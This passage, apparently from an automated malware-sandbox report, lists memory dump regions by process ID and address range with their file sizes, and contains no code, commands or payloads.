                                                                                                            • memory/5284-332-0x0000000007DC0000-0x0000000007DC1000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/5284-320-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5284-336-0x0000000007B10000-0x0000000007B11000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/5284-323-0x0000000006C10000-0x0000000006C11000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/5284-324-0x0000000007280000-0x0000000007281000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/5284-326-0x0000000000F10000-0x0000000000F11000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/5284-360-0x0000000000F13000-0x0000000000F14000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/5284-344-0x0000000008450000-0x0000000008451000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/5336-333-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5380-306-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5380-316-0x00000000048C0000-0x0000000004951000-memory.dmp
                                                                                                              Filesize

                                                                                                              580KB

                                                                                                            • memory/5380-317-0x0000000000400000-0x0000000002BF4000-memory.dmp
                                                                                                              Filesize

                                                                                                              40.0MB

                                                                                                            • memory/5408-236-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5436-239-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5444-369-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5484-248-0x00000181E16B0000-0x00000181E16FB000-memory.dmp
                                                                                                              Filesize

                                                                                                              300KB

                                                                                                            • memory/5484-319-0x00000181E3E00000-0x00000181E3F01000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/5484-242-0x00007FF6560E4060-mapping.dmp
                                                                                                            • memory/5484-254-0x00000181E1880000-0x00000181E18F0000-memory.dmp
                                                                                                              Filesize

                                                                                                              448KB

                                                                                                            • memory/5548-305-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5620-312-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5800-307-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5836-368-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5836-310-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5948-355-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5948-357-0x00000000057A0000-0x00000000057A1000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/5948-311-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5972-314-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6004-325-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6008-288-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6016-367-0x00000000004163DA-mapping.dmp
                                                                                                            • memory/6080-293-0x0000000000000000-mapping.dmp